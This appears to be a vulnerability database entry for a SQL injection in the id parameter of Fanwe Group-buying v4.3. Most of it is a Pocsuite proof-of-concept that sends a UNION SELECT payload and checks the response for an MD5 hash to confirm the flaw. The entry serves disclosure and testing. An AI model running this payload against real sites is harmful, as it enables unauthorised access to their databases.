方维团购 4.3 /app/source/goods_list.php SQL注入漏洞

🗓️ 11 Jul 2014 00:00:00Reported by RootType

方维团购 4.3 /app/source/goods_list.php SQL注入漏洞. SQL注入漏洞在方维团购v4.3的/app/source/goods_list.php中，由id参数引起


                                                #!/usr/bin/env python
# coding: utf-8

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register

class TestPOC(POCBase):
    vulID = 'SSV-87131'  # vul ID
    version = '1'
    author = 'fenghh'
    vulDate = '2014-07-11'
    createDate = '2015-10-14'
    updateDate = '2015-10-14'
    references = ['http://www.sebug.net/vuldb/ssvid-87131']
    name = '方维团购 4.3 /app/source/goods_list.php SQL注入漏洞'
    appPowerLink = 'http://www.fanwe.com/'
    appName = '方维团购'
    appVersion = '4.3'
    vulType = 'SQL Injecion'
    desc = '''  
       方维团购 v4.3 /app/source/goods_list.php，id造成了注入
    '''
    # the sample sites for examine
    samples = ['']

    def _verify(self):
        output = Output(self)
        result = {}
        payload = "/index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5%28333%29%29%23"
        verify_url = self.url + payload
        response = req.get(verify_url)
        if '310dcbbf4cce62f762a2aaa148d556bd' in response.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = verify_url
            output.success(result)
        else:
            output.fail('SQL Injecion Failed')
        return output

    def _attack(self):   
        return self._verify()
        
register(TestPOC)

11 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1

方维团购 4.3 sql注入注入漏洞 goods_list.php 方维团购v4.3 id参数